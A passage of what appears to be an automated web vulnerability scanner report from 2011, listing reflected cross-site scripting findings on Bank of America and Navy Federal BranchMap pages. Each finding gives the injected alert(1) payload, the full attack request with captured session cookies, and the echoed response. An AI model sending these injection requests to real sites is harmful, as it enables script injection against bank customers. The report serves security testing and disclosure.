3.74. http://www.bankofamerica.com/deposits/checksave/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /deposits/checksave/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9fa1"><script>alert(1)</script>1cb498be8e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /depositse9fa1"><script>alert(1)</script>1cb498be8e3/checksave/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:53 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=1655092907.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/depositse9fa1"><script>alert(1)</script>1cb498be8e3/checksave/index.cfm">
...[SNIP]...

3.75. http://www.bankofamerica.com/deposits/checksave/index.cfm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /deposits/checksave/index.cfm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 491c6"><script>alert(1)</script>20cb5e334dd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /deposits/checksave491c6"><script>alert(1)</script>20cb5e334dd/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:54 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=1604761259.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/deposits/checksave491c6"><script>alert(1)</script>20cb5e334dd/index.cfm">
...[SNIP]...

3.76. http://www.bankofamerica.com/financialtools/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /financialtools/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac50f"><script>alert(1)</script>4765bb30cc9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /financialtoolsac50f"><script>alert(1)</script>4765bb30cc9/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:36:08 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/financialtoolsac50f"><script>alert(1)</script>4765bb30cc9/index.cfm">
...[SNIP]...

3.77. http://www.bankofamerica.com/findit/locator.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /findit/locator.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bee12"><script>alert(1)</script>8e3b0539708 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /finditbee12"><script>alert(1)</script>8e3b0539708/locator.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:35:37 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/finditbee12"><script>alert(1)</script>8e3b0539708/locator.cfm">
...[SNIP]...

3.78. http://www.bankofamerica.com/help/equalhousing.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /help/equalhousing.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58bd1"><script>alert(1)</script>2153a6eecc8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /help58bd1"><script>alert(1)</script>2153a6eecc8/equalhousing.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:33:29 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/help58bd1"><script>alert(1)</script>2153a6eecc8/equalhousing.cfm">
...[SNIP]...

3.79. http://www.bankofamerica.com/help/equalhousing_popup.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /help/equalhousing_popup.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bddc5"><script>alert(1)</script>c62490d0000 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /helpbddc5"><script>alert(1)</script>c62490d0000/equalhousing_popup.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:25 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=1453766315.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/helpbddc5"><script>alert(1)</script>c62490d0000/equalhousing_popup.cfm">
...[SNIP]...

3.80. http://www.bankofamerica.com/help/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /help/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec464"><script>alert(1)</script>899a7c53100 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /helpec464"><script>alert(1)</script>899a7c53100/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:33:44 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/helpec464"><script>alert(1)</script>899a7c53100/index.cfm">
...[SNIP]...

3.81. http://www.bankofamerica.com/loansandhomes/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /loansandhomes/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a99e1"><script>alert(1)</script>5ff4d40fe3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /loansandhomesa99e1"><script>alert(1)</script>5ff4d40fe3b/index.cfm?template=lc_mortgage HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:35:59 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/loansandhomesa99e1"><script>alert(1)</script>5ff4d40fe3b/index.cfmtemplate=lc_mortgage">
...[SNIP]...

3.82. http://www.bankofamerica.com/onlinebanking/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /onlinebanking/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 864f9"><script>alert(1)</script>190e5f7b296 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /onlinebanking864f9"><script>alert(1)</script>190e5f7b296/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:00 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=1604761259.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/onlinebanking864f9"><script>alert(1)</script>190e5f7b296/index.cfm">
...[SNIP]...

3.83. http://www.bankofamerica.com/pap/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /pap/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88c92"><script>alert(1)</script>201cd186128 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pap88c92"><script>alert(1)</script>201cd186128/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:13 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=480687787.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/pap88c92"><script>alert(1)</script>201cd186128/index.cfm">
...[SNIP]...

3.84. http://www.bankofamerica.com/studentbanking/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /studentbanking/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ede62"><script>alert(1)</script>778b0ce2212 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /studentbankingede62"><script>alert(1)</script>778b0ce2212/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:58 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=866563755.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/studentbankingede62"><script>alert(1)</script>778b0ce2212/index.cfm">
...[SNIP]...

3.85. http://www.bankofamerica.com/vehicle_and_personal_loans/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /vehicle_and_personal_loans/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 544ce"><script>alert(1)</script>45ae18a6011 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle_and_personal_loans544ce"><script>alert(1)</script>45ae18a6011/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:20 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=480687787.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/vehicle_and_personal_loans544ce"><script>alert(1)</script>45ae18a6011/index.cfm">
...[SNIP]...

3.86. http://www.branchmap.com/mapserver.php [city parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.branchmap.com
Path:   /mapserver.php

Issue detail

The value of the city request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a923</script><script>alert(1)</script>09ca345e6cd was submitted in the city parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapserver.php?&intl=1&dist=9&zoom=12&zip=&client=navy&city=9a923</script><script>alert(1)</script>09ca345e6cd HTTP/1.1
Host: www.branchmap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:06:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 11476


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<title>Navy Federal BranchMap</title>
<head>
<script type="text/javascript">

var mydist='9';
var myaddress='';
var mystate='';
var mycity='9a923</script><script>alert(1)</script>09ca345e6cd';
var myzip='';
var mylat='';
var mylon='';
var clientid='navy';
var mynetworklist='vcom,coop,cashpoints,moneypass,keybank';
var maxlocations=parseInt(5);
var sortstrict= '0';
var myzoom = parseInt(12
...[SNIP]...

3.87. http://www.branchmap.com/mapserver.php [dist parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.branchmap.com
Path:   /mapserver.php

Issue detail

The value of the dist request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a6fe</script><script>alert(1)</script>c091167078b was submitted in the dist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapserver.php?&intl=1&dist=96a6fe</script><script>alert(1)</script>c091167078b&zoom=12&zip=&client=navy&city= HTTP/1.1
Host: www.branchmap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:05:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 11476


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<title>Navy Federal BranchMap</title>
<head>
<script type="text/javascript">

var mydist='96a6fe</script><script>alert(1)</script>c091167078b';
var myaddress='';
var mystate='';
var mycity='';
var myzip='';
var mylat='';
var mylon='';
var clientid='navy';
var mynetworklist='vcom,coop,cashpoints,moneypass,keybank';
var maxlocations=parseInt(
...[SNIP]...

3.88. http://www.branchmap.com/mapserver.php [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.branchmap.com
Path:   /mapserver.php

Issue detail

The value of the zip request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17a84</script><script>alert(1)</script>6bbb498c306 was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapserver.php?client=navy&zip=17a84</script><script>alert(1)</script>6bbb498c306 HTTP/1.1
Host: www.branchmap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:05:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 11469


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<title>Navy Federal BranchMap</title>
<head>
<script type="text/javascript">

var mydist='3';
var myaddress='';
var mystate='';
var mycity='';
var myzip='17a84</script><script>alert(1)</script>6bbb498c306';
var mylat='';
var mylon='';
var clientid='navy';
var mynetworklist='vcom,coop,cashpoints,moneypass,keybank';
var maxlocations=parseInt(5);
var sortstrict= '0';
var myzoom = parseInt(8);
var maptype
...[SNIP]...

3.89. http://www.branchmap.com/mapserver.php [zoom parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.branchmap.com
Path:   /mapserver.php

Issue detail

The value of the zoom request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2ceaa%3balert(1)//c7cc7a9b7c8 was submitted in the zoom parameter. This input was echoed as 2ceaa;alert(1)//c7cc7a9b7c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapserver.php?&intl=1&dist=9&zoom=122ceaa%3balert(1)//c7cc7a9b7c8&zip=&client=navy&city= HTTP/1.1
Host: www.branchmap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:05:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 11453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<title>Navy Federal BranchMap</title>
<head>
<script t
...[SNIP]...
';
var myzip='';
var mylat='';
var mylon='';
var clientid='navy';
var mynetworklist='vcom,coop,cashpoints,moneypass,keybank';
var maxlocations=parseInt(5);
var sortstrict= '0';
var myzoom = parseInt(122ceaa;alert(1)//c7cc7a9b7c8);
var maptype = '';
var mapwidth= '552';
var mapheight= '500';
var zoomfirst = '';
var myversion = 'v53';
var dedupeList = 'navy';
var drivingDir = '';
var noOriginPoint = '';
var disclaimer = '';
var
...[SNIP]...

